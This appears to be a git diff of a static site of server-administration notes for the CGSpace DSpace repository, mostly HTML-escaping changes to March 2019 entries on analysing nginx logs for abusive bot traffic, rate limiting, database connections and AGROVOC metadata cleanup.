$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-22 | sort -u | wc -l
7904
</code></pre><ul>
<li>PostgreSQL seems to be pretty busy:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
11 dspaceApi
10 dspaceCli
67 dspaceWeb
@ -931,7 +931,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
<li>UptimeRobot says CGSpace went down again and I see the load is again at 14.0!</li>
<li>Here are the top IPs in nginx logs in the last hour:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;26/Mar/2019:(06|07)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;26/Mar/2019:(06|07)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
3 35.174.184.209
3 66.249.66.81
4 104.198.9.108
@ -942,7 +942,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
414 45.5.184.72
535 45.5.186.2
2014 205.186.128.185
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;26/Mar/2019:(06|07)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;26/Mar/2019:(06|07)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
157 41.204.190.40
160 18.194.46.84
160 54.70.40.11
@ -960,7 +960,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
<li>I will add these three to the &ldquo;bad bot&rdquo; rate limiting that I originally used for Baidu</li>
<li>Going further, these are the IPs making requests to Discovery and Browse pages so far today:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;(discover|browse)&quot; | grep -E &quot;26/Mar/2019:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;(discover|browse)&#34; | grep -E &#34;26/Mar/2019:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
120 34.207.146.166
128 3.91.79.74
132 108.179.57.67
@ -978,7 +978,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
<li>I can only hope that this helps the load go down because all this traffic is disrupting the service for normal users and well-behaved bots (and interrupting my dinner and breakfast)</li>
<li>Looking at the database usage I&rsquo;m wondering why there are so many connections from the DSpace CLI:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
10 dspaceCli
13 dspaceWeb
@ -987,19 +987,19 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
<li>Make a minor edit to my <code>agrovoc-lookup.py</code> script to match subject terms with parentheses like <code>COCOA (PLANT)</code></li>
<li>Test 89 corrections and 79 deletions for AGROVOC subject terms from the ones I cleaned up in the last week</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-03-26-AGROVOC-89-corrections.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d -n
$ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d -n
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-03-26-AGROVOC-89-corrections.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.subject -m 57 -t correct -d -n
$ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 57 -f dc.subject -d -n
</code></pre><ul>
<li>UptimeRobot says CGSpace is down again, but it seems to just be slow, as the load is over 10.0</li>
<li>Looking at the nginx logs I don&rsquo;t see anything terribly abusive, but SemrushBot has made ~3,000 requests to Discovery and Browse pages today:</li>
</ul>
<pre tabindex="0"><code># grep SemrushBot /var/log/nginx/access.log | grep -E &quot;26/Mar/2019&quot; | grep -E '(discover|browse)' | wc -l
<pre tabindex="0"><code># grep SemrushBot /var/log/nginx/access.log | grep -E &#34;26/Mar/2019&#34; | grep -E &#39;(discover|browse)&#39; | wc -l
2931
</code></pre><ul>
<li>So I&rsquo;m adding it to the badbot rate limiting in nginx, and actually, I kinda feel like just blocking all user agents with &ldquo;bot&rdquo; in the name for a few days to see if things calm down&hellip; maybe not just yet</li>
<li>Otherwise, these are the top users in the web and API logs the last hour (1819):</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;26/Mar/2019:(18|19)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;26/Mar/2019:(18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
54 41.216.228.158
65 199.47.87.140
75 157.55.39.238
@ -1010,7 +1010,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
277 2a01:4f8:13b:1296::2
291 66.249.66.80
328 35.174.184.209
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;26/Mar/2019:(18|19)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;26/Mar/2019:(18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
2 2409:4066:211:2caf:3c31:3fae:2212:19cc
2 35.10.204.140
2 45.251.231.45
@ -1025,7 +1025,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
<li>For the XMLUI I see <code>18.195.78.144</code> and <code>18.196.196.108</code> requesting only CTA items and with no user agent</li>
<li>They are responsible for almost 1,000 XMLUI sessions today:</li>
</ul>
<pre tabindex="0"><code>$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=(18.195.78.144|18.196.196.108)' dspace.log.2019-03-26 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=(18.195.78.144|18.196.196.108)&#39; dspace.log.2019-03-26 | sort | uniq | wc -l
937
</code></pre><ul>
<li>I will add their IPs to the list of bot IPs in nginx so I can tag them as bots to let Tomcat&rsquo;s Crawler Session Manager Valve to force them to re-use their session</li>
@ -1033,7 +1033,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
<li>I will add curl to the Tomcat Crawler Session Manager because anyone using curl is most likely an automated read-only request</li>
<li>I will add GuzzleHttp to the nginx badbots rate limiting, because it is making requests to dynamic Discovery pages</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep 45.5.184.72 | grep -E &quot;26/Mar/2019:&quot; | grep -E '(discover|browse)' | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep 45.5.184.72 | grep -E &#34;26/Mar/2019:&#34; | grep -E &#39;(discover|browse)&#39; | wc -l
119
</code></pre><ul>
<li>What&rsquo;s strange is that I can&rsquo;t see any of their requests in the DSpace log&hellip;</li>
@ -1045,7 +1045,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
<li>Run the corrections and deletions to AGROVOC (dc.subject) on DSpace Test and CGSpace, and then start a full re-index of Discovery</li>
<li>What the hell is going on with this CTA publication?</li>
</ul>
<pre tabindex="0"><code># grep Spore-192-EN-web.pdf /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># grep Spore-192-EN-web.pdf /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
1 37.48.65.147
1 80.113.172.162
2 108.174.5.117
@ -1077,7 +1077,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
</li>
<li>In other news, I see that it&rsquo;s not even the end of the month yet and we have 3.6 million hits already:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Mar/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Mar/2019&#34;
3654911
</code></pre><ul>
<li>In other other news I see that DSpace has no statistics for years before 2019 currently, yet when I connect to Solr I see all the cores up</li>
@ -1105,7 +1105,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
<li>It is frustrating to see that the load spikes for own own legitimate load on the server were <em>very</em> aggravated and drawn out by the contention for CPU on this host</li>
<li>We had 4.2 million hits this month according to the web server logs:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Mar/2019&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Mar/2019&#34;
4218841
real 0m26.609s
@ -1114,7 +1114,7 @@ sys 0m2.551s
</code></pre><ul>
<li>Interestingly, now that the CPU steal is not an issue the REST API is ten seconds faster than it was in <a href="/cgspace-notes/2018-10/">2018-10</a>:</li>
</ul>
<pre tabindex="0"><code>$ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
...
0.33s user 0.07s system 2% cpu 17.167 total
0.27s user 0.04s system 1% cpu 16.643 total
@ -1137,7 +1137,7 @@ sys 0m2.551s
<li>Looking at the weird issue with shitloads of downloads on the <a href="https://cgspace.cgiar.org/handle/10568/100289">CTA item</a> again</li>
<li>The item was added on 2019-03-13 and these three IPs have attempted to download the item&rsquo;s bitstream 43,000 times since it was added eighteen days ago:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2..17}.gz | grep 'Spore-192-EN-web.pdf' | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 5
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2..17}.gz | grep &#39;Spore-192-EN-web.pdf&#39; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 5
42 196.43.180.134
621 185.247.144.227
8102 18.194.46.84
@ -1168,16 +1168,16 @@ sys 0m2.551s
</ul>
</li>
</ul>
<pre tabindex="0"><code>_altmetric.embed_callback({&quot;title&quot;:&quot;Distilling the role of ecosystem services in the Sustainable Development Goals&quot;,&quot;doi&quot;:&quot;10.1016/j.ecoser.2017.10.010&quot;,&quot;tq&quot;:[&quot;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&quot;,&quot;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&quot;,&quot;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&quot;,&quot;Excellent paper about the contribution of #ecosystemservices to SDGs&quot;,&quot;So great to work with amazing collaborators&quot;],&quot;altmetric_jid&quot;:&quot;521611533cf058827c00000a&quot;,&quot;issns&quot;:[&quot;2212-0416&quot;],&quot;journal&quot;:&quot;Ecosystem Services&quot;,&quot;cohorts&quot;:{&quot;sci&quot;:58,&quot;pub&quot;:239,&quot;doc&quot;:3,&quot;com&quot;:2},&quot;context&quot;:{&quot;all&quot;:{&quot;count&quot;:12732768,&quot;mean&quot;:7.8220956572788,&quot;rank&quot;:56146,&quot;pct&quot;:99,&quot;higher_than&quot;:12676701},&quot;journal&quot;:{&quot;count&quot;:549,&quot;mean&quot;:7.7567299270073,&quot;rank&quot;:2,&quot;pct&quot;:99,&quot;higher_than&quot;:547},&quot;similar_age_3m&quot;:{&quot;count&quot;:386919,&quot;mean&quot;:11.573702536454,&quot;rank&quot;:3299,&quot;pct&quot;:99,&quot;higher_than&quot;:383619},&quot;similar_age_journal_3m&quot;:{&quot;count&quot;:28,&quot;mean&quot;:9.5648148148148,&quot;rank&quot;:1,&quot;pct&quot;:96,&quot;higher_than&quot;:27}},&quot;authors&quot;:[&quot;Sylvia L.R. Wood&quot;,&quot;Sarah K. Jones&quot;,&quot;Justin A. Johnson&quot;,&quot;Kate A. Brauman&quot;,&quot;Rebecca Chaplin-Kramer&quot;,&quot;Alexander Fremier&quot;,&quot;Evan Girvetz&quot;,&quot;Line J. Gordon&quot;,&quot;Carrie V. Kappel&quot;,&quot;Lisa Mandle&quot;,&quot;Mark Mulligan&quot;,&quot;Patrick O'Farrell&quot;,&quot;William K. Smith&quot;,&quot;Louise Willemen&quot;,&quot;Wei Zhang&quot;,&quot;Fabrice A. DeClerck&quot;],&quot;type&quot;:&quot;article&quot;,&quot;handles&quot;:[&quot;10568/89975&quot;,&quot;10568/89846&quot;],&quot;handle&quot;:&quot;10568/89975&quot;,&quot;altmetric_id&quot;:29816439,&quot;schema&quot;:&quot;1.5.4&quot;,&quot;is_oa&quot;:false,&quot;cited_by_posts_count&quot;:377,&quot;cited_by_tweeters_count&quot;:302,&quot;cited_by_fbwalls_count&quot;:1,&quot;cited_by_gplus_count&quot;:1,&quot;cited_by_policies_count&quot;:2,&quot;cited_by_accounts_count&quot;:306,&quot;last_updated&quot;:1554039125,&quot;score&quot;:208.65,&quot;history&quot;:{&quot;1y&quot;:54.75,&quot;6m&quot;:10.35,&quot;3m&quot;:5.5,&quot;1m&quot;:5.5,&quot;1w&quot;:1.5,&quot;6d&quot;:1.5,&quot;5d&quot;:1.5,&quot;4d&quot;:1.5,&quot;3d&quot;:1.5,&quot;2d&quot;:1,&quot;1d&quot;:1,&quot;at&quot;:208.65},&quot;url&quot;:&quot;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&quot;,&quot;added_on&quot;:1512153726,&quot;published_on&quot;:1517443200,&quot;readers&quot;:{&quot;citeulike&quot;:0,&quot;mendeley&quot;:248,&quot;connotea&quot;:0},&quot;readers_count&quot;:248,&quot;images&quot;:{&quot;small&quot;:&quot;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&quot;,&quot;medium&quot;:&quot;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&quot;,&quot;large&quot;:&quot;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&quot;},&quot;details_url&quot;:&quot;http://www.altmetric.com/details.php?citation_id=29816439&quot;})
<pre tabindex="0"><code>_altmetric.embed_callback({&#34;title&#34;:&#34;Distilling the role of ecosystem services in the Sustainable Development Goals&#34;,&#34;doi&#34;:&#34;10.1016/j.ecoser.2017.10.010&#34;,&#34;tq&#34;:[&#34;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&#34;,&#34;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&#34;,&#34;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&#34;,&#34;Excellent paper about the contribution of #ecosystemservices to SDGs&#34;,&#34;So great to work with amazing collaborators&#34;],&#34;altmetric_jid&#34;:&#34;521611533cf058827c00000a&#34;,&#34;issns&#34;:[&#34;2212-0416&#34;],&#34;journal&#34;:&#34;Ecosystem Services&#34;,&#34;cohorts&#34;:{&#34;sci&#34;:58,&#34;pub&#34;:239,&#34;doc&#34;:3,&#34;com&#34;:2},&#34;context&#34;:{&#34;all&#34;:{&#34;count&#34;:12732768,&#34;mean&#34;:7.8220956572788,&#34;rank&#34;:56146,&#34;pct&#34;:99,&#34;higher_than&#34;:12676701},&#34;journal&#34;:{&#34;count&#34;:549,&#34;mean&#34;:7.7567299270073,&#34;rank&#34;:2,&#34;pct&#34;:99,&#34;higher_than&#34;:547},&#34;similar_age_3m&#34;:{&#34;count&#34;:386919,&#34;mean&#34;:11.573702536454,&#34;rank&#34;:3299,&#34;pct&#34;:99,&#34;higher_than&#34;:383619},&#34;similar_age_journal_3m&#34;:{&#34;count&#34;:28,&#34;mean&#34;:9.5648148148148,&#34;rank&#34;:1,&#34;pct&#34;:96,&#34;higher_than&#34;:27}},&#34;authors&#34;:[&#34;Sylvia L.R. Wood&#34;,&#34;Sarah K. Jones&#34;,&#34;Justin A. Johnson&#34;,&#34;Kate A. Brauman&#34;,&#34;Rebecca Chaplin-Kramer&#34;,&#34;Alexander Fremier&#34;,&#34;Evan Girvetz&#34;,&#34;Line J. Gordon&#34;,&#34;Carrie V. Kappel&#34;,&#34;Lisa Mandle&#34;,&#34;Mark Mulligan&#34;,&#34;Patrick O&#39;Farrell&#34;,&#34;William K. Smith&#34;,&#34;Louise Willemen&#34;,&#34;Wei Zhang&#34;,&#34;Fabrice A. DeClerck&#34;],&#34;type&#34;:&#34;article&#34;,&#34;handles&#34;:[&#34;10568/89975&#34;,&#34;10568/89846&#34;],&#34;handle&#34;:&#34;10568/89975&#34;,&#34;altmetric_id&#34;:29816439,&#34;schema&#34;:&#34;1.5.4&#34;,&#34;is_oa&#34;:false,&#34;cited_by_posts_count&#34;:377,&#34;cited_by_tweeters_count&#34;:302,&#34;cited_by_fbwalls_count&#34;:1,&#34;cited_by_gplus_count&#34;:1,&#34;cited_by_policies_count&#34;:2,&#34;cited_by_accounts_count&#34;:306,&#34;last_updated&#34;:1554039125,&#34;score&#34;:208.65,&#34;history&#34;:{&#34;1y&#34;:54.75,&#34;6m&#34;:10.35,&#34;3m&#34;:5.5,&#34;1m&#34;:5.5,&#34;1w&#34;:1.5,&#34;6d&#34;:1.5,&#34;5d&#34;:1.5,&#34;4d&#34;:1.5,&#34;3d&#34;:1.5,&#34;2d&#34;:1,&#34;1d&#34;:1,&#34;at&#34;:208.65},&#34;url&#34;:&#34;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&#34;,&#34;added_on&#34;:1512153726,&#34;published_on&#34;:1517443200,&#34;readers&#34;:{&#34;citeulike&#34;:0,&#34;mendeley&#34;:248,&#34;connotea&#34;:0},&#34;readers_count&#34;:248,&#34;images&#34;:{&#34;small&#34;:&#34;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&#34;,&#34;medium&#34;:&#34;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&#34;,&#34;large&#34;:&#34;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&#34;},&#34;details_url&#34;:&#34;http://www.altmetric.com/details.php?citation_id=29816439&#34;})
</code></pre><ul>
<li>The response paylod for the second one is the same:</li>
</ul>
<pre tabindex="0"><code>_altmetric.embed_callback({&quot;title&quot;:&quot;Distilling the role of ecosystem services in the Sustainable Development Goals&quot;,&quot;doi&quot;:&quot;10.1016/j.ecoser.2017.10.010&quot;,&quot;tq&quot;:[&quot;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&quot;,&quot;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&quot;,&quot;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&quot;,&quot;Excellent paper about the contribution of #ecosystemservices to SDGs&quot;,&quot;So great to work with amazing collaborators&quot;],&quot;altmetric_jid&quot;:&quot;521611533cf058827c00000a&quot;,&quot;issns&quot;:[&quot;2212-0416&quot;],&quot;journal&quot;:&quot;Ecosystem Services&quot;,&quot;cohorts&quot;:{&quot;sci&quot;:58,&quot;pub&quot;:239,&quot;doc&quot;:3,&quot;com&quot;:2},&quot;context&quot;:{&quot;all&quot;:{&quot;count&quot;:12732768,&quot;mean&quot;:7.8220956572788,&quot;rank&quot;:56146,&quot;pct&quot;:99,&quot;higher_than&quot;:12676701},&quot;journal&quot;:{&quot;count&quot;:549,&quot;mean&quot;:7.7567299270073,&quot;rank&quot;:2,&quot;pct&quot;:99,&quot;higher_than&quot;:547},&quot;similar_age_3m&quot;:{&quot;count&quot;:386919,&quot;mean&quot;:11.573702536454,&quot;rank&quot;:3299,&quot;pct&quot;:99,&quot;higher_than&quot;:383619},&quot;similar_age_journal_3m&quot;:{&quot;count&quot;:28,&quot;mean&quot;:9.5648148148148,&quot;rank&quot;:1,&quot;pct&quot;:96,&quot;higher_than&quot;:27}},&quot;authors&quot;:[&quot;Sylvia L.R. Wood&quot;,&quot;Sarah K. Jones&quot;,&quot;Justin A. Johnson&quot;,&quot;Kate A. Brauman&quot;,&quot;Rebecca Chaplin-Kramer&quot;,&quot;Alexander Fremier&quot;,&quot;Evan Girvetz&quot;,&quot;Line J. Gordon&quot;,&quot;Carrie V. Kappel&quot;,&quot;Lisa Mandle&quot;,&quot;Mark Mulligan&quot;,&quot;Patrick O'Farrell&quot;,&quot;William K. Smith&quot;,&quot;Louise Willemen&quot;,&quot;Wei Zhang&quot;,&quot;Fabrice A. DeClerck&quot;],&quot;type&quot;:&quot;article&quot;,&quot;handles&quot;:[&quot;10568/89975&quot;,&quot;10568/89846&quot;],&quot;handle&quot;:&quot;10568/89975&quot;,&quot;altmetric_id&quot;:29816439,&quot;schema&quot;:&quot;1.5.4&quot;,&quot;is_oa&quot;:false,&quot;cited_by_posts_count&quot;:377,&quot;cited_by_tweeters_count&quot;:302,&quot;cited_by_fbwalls_count&quot;:1,&quot;cited_by_gplus_count&quot;:1,&quot;cited_by_policies_count&quot;:2,&quot;cited_by_accounts_count&quot;:306,&quot;last_updated&quot;:1554039125,&quot;score&quot;:208.65,&quot;history&quot;:{&quot;1y&quot;:54.75,&quot;6m&quot;:10.35,&quot;3m&quot;:5.5,&quot;1m&quot;:5.5,&quot;1w&quot;:1.5,&quot;6d&quot;:1.5,&quot;5d&quot;:1.5,&quot;4d&quot;:1.5,&quot;3d&quot;:1.5,&quot;2d&quot;:1,&quot;1d&quot;:1,&quot;at&quot;:208.65},&quot;url&quot;:&quot;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&quot;,&quot;added_on&quot;:1512153726,&quot;published_on&quot;:1517443200,&quot;readers&quot;:{&quot;citeulike&quot;:0,&quot;mendeley&quot;:248,&quot;connotea&quot;:0},&quot;readers_count&quot;:248,&quot;images&quot;:{&quot;small&quot;:&quot;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&quot;,&quot;medium&quot;:&quot;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&quot;,&quot;large&quot;:&quot;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&quot;},&quot;details_url&quot;:&quot;http://www.altmetric.com/details.php?citation_id=29816439&quot;})
<pre tabindex="0"><code>_altmetric.embed_callback({&#34;title&#34;:&#34;Distilling the role of ecosystem services in the Sustainable Development Goals&#34;,&#34;doi&#34;:&#34;10.1016/j.ecoser.2017.10.010&#34;,&#34;tq&#34;:[&#34;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&#34;,&#34;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&#34;,&#34;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&#34;,&#34;Excellent paper about the contribution of #ecosystemservices to SDGs&#34;,&#34;So great to work with amazing collaborators&#34;],&#34;altmetric_jid&#34;:&#34;521611533cf058827c00000a&#34;,&#34;issns&#34;:[&#34;2212-0416&#34;],&#34;journal&#34;:&#34;Ecosystem Services&#34;,&#34;cohorts&#34;:{&#34;sci&#34;:58,&#34;pub&#34;:239,&#34;doc&#34;:3,&#34;com&#34;:2},&#34;context&#34;:{&#34;all&#34;:{&#34;count&#34;:12732768,&#34;mean&#34;:7.8220956572788,&#34;rank&#34;:56146,&#34;pct&#34;:99,&#34;higher_than&#34;:12676701},&#34;journal&#34;:{&#34;count&#34;:549,&#34;mean&#34;:7.7567299270073,&#34;rank&#34;:2,&#34;pct&#34;:99,&#34;higher_than&#34;:547},&#34;similar_age_3m&#34;:{&#34;count&#34;:386919,&#34;mean&#34;:11.573702536454,&#34;rank&#34;:3299,&#34;pct&#34;:99,&#34;higher_than&#34;:383619},&#34;similar_age_journal_3m&#34;:{&#34;count&#34;:28,&#34;mean&#34;:9.5648148148148,&#34;rank&#34;:1,&#34;pct&#34;:96,&#34;higher_than&#34;:27}},&#34;authors&#34;:[&#34;Sylvia L.R. Wood&#34;,&#34;Sarah K. Jones&#34;,&#34;Justin A. Johnson&#34;,&#34;Kate A. Brauman&#34;,&#34;Rebecca Chaplin-Kramer&#34;,&#34;Alexander Fremier&#34;,&#34;Evan Girvetz&#34;,&#34;Line J. Gordon&#34;,&#34;Carrie V. Kappel&#34;,&#34;Lisa Mandle&#34;,&#34;Mark Mulligan&#34;,&#34;Patrick O&#39;Farrell&#34;,&#34;William K. Smith&#34;,&#34;Louise Willemen&#34;,&#34;Wei Zhang&#34;,&#34;Fabrice A. DeClerck&#34;],&#34;type&#34;:&#34;article&#34;,&#34;handles&#34;:[&#34;10568/89975&#34;,&#34;10568/89846&#34;],&#34;handle&#34;:&#34;10568/89975&#34;,&#34;altmetric_id&#34;:29816439,&#34;schema&#34;:&#34;1.5.4&#34;,&#34;is_oa&#34;:false,&#34;cited_by_posts_count&#34;:377,&#34;cited_by_tweeters_count&#34;:302,&#34;cited_by_fbwalls_count&#34;:1,&#34;cited_by_gplus_count&#34;:1,&#34;cited_by_policies_count&#34;:2,&#34;cited_by_accounts_count&#34;:306,&#34;last_updated&#34;:1554039125,&#34;score&#34;:208.65,&#34;history&#34;:{&#34;1y&#34;:54.75,&#34;6m&#34;:10.35,&#34;3m&#34;:5.5,&#34;1m&#34;:5.5,&#34;1w&#34;:1.5,&#34;6d&#34;:1.5,&#34;5d&#34;:1.5,&#34;4d&#34;:1.5,&#34;3d&#34;:1.5,&#34;2d&#34;:1,&#34;1d&#34;:1,&#34;at&#34;:208.65},&#34;url&#34;:&#34;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&#34;,&#34;added_on&#34;:1512153726,&#34;published_on&#34;:1517443200,&#34;readers&#34;:{&#34;citeulike&#34;:0,&#34;mendeley&#34;:248,&#34;connotea&#34;:0},&#34;readers_count&#34;:248,&#34;images&#34;:{&#34;small&#34;:&#34;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&#34;,&#34;medium&#34;:&#34;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&#34;,&#34;large&#34;:&#34;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&#34;},&#34;details_url&#34;:&#34;http://www.altmetric.com/details.php?citation_id=29816439&#34;})
</code></pre><ul>
<li>Very interesting to see this in the response:</li>
</ul>
<pre tabindex="0"><code>&quot;handles&quot;:[&quot;10568/89975&quot;,&quot;10568/89846&quot;],
&quot;handle&quot;:&quot;10568/89975&quot;
<pre tabindex="0"><code>&#34;handles&#34;:[&#34;10568/89975&#34;,&#34;10568/89846&#34;],
&#34;handle&#34;:&#34;10568/89975&#34;
</code></pre><ul>
<li>On further inspection I see that the Altmetric explorer pages for each of these Handles is actually doing the right thing:
<ul>

View File

@ -64,7 +64,7 @@ $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u ds
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -163,16 +163,16 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</ul>
</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
